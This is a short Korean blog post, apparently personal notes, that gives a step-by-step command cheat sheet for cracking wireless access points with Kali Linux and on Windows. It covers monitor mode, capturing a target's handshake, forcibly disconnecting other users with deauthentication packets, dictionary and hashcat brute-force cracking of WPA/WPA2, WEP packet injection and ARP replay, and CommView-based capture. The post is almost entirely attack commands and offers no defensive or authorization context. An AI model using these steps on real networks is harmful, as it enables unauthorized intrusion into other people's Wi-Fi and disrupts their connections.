ABOUT ME

-

Today
-
Yesterday
-
Total
-
  • Kali linux를 이용한 AP 해킹 (+windows)
    Hack/No filtered 2021. 1. 12. 09:42

    iwconfig

    ifconfig wlan0 down

     

    [모니터 모드 전환]

    airmon-ng check kill : 모드 전환 시 간섭 발생 가능성이 있는 프로세스 종료

     

    airmon-ng start wlan0

     

    iwconfig

     

    [주변 무선랜 스캔]

    airodump-ng wlan0mon

     

    [타겟 설정]

    airodump-ng wlan0mon --channel 3 --bssid [bssid] -w [filename]

     

    [강제로 다른 사용자 연결 해제]

    aireplay-ng 0 [인증 해제 횟수] -a [AP의 MAC주소] -c [접속한 장비의 MAC주소]

     

    [사전 대입, wpa wpa2]

    aircrack-ng wpacrack-01.cap -w /usr/share/wordlists/sqlmap.txt


    [hashcat 사용]

    cap 파일을 hccapx로 확장자 변환

    #cap2hccapx.bin [cap file] [hccapx file]

    #hashcat -m 2500 -a 3 --force [hccapx file] 0000?d?d?d?d

     : "wpa2로 암호화되어있으며, 0000뒤에 숫자4글자인 비밀번호를 bruteforce해라." 라는 의미

     

    기존에 나온 결과 값을 참고하기 위해 --show 옵션 사용 가능


    [wep 사용시]

    aireplay-ng wlan0mon -1 0 -a [ap 맥주소] -h [랜카드 맥주소] : 패킷인젝션

    aireplay-ng wlan0mon -3 -b [ap 맥주소] -h [랜카드 맥주소] :  apr request replay 다량의 패킷 유발

     

    data 35000개 이상 모은 후에

    aircrack-ng -b [AP 맥주소] [cap file] 실행

    안되면 5000개씩 data를 자동으로 더모으고 크랙을 시도함


    [windows 환경]

    - commview for wifi 설치

    - logging 설정 : auto_saving, 200000, 100

    - 재생버튼 클릭

    - 타겟 설정후 single channel mode로 변경

    - 무료버전이므로 위 과정을 수차례 시도하여 데이터 수집

    - Log Viewer에서 local commView logs 로드

    - export log에서 wireshark tcp dump로 pcap 파일로 변경

    >aircrack-ng.exe

    index number 입력하면 crack!!

    >aircrack-ng.exe -w [password.lst] [name.cap]

Designed by Tistory.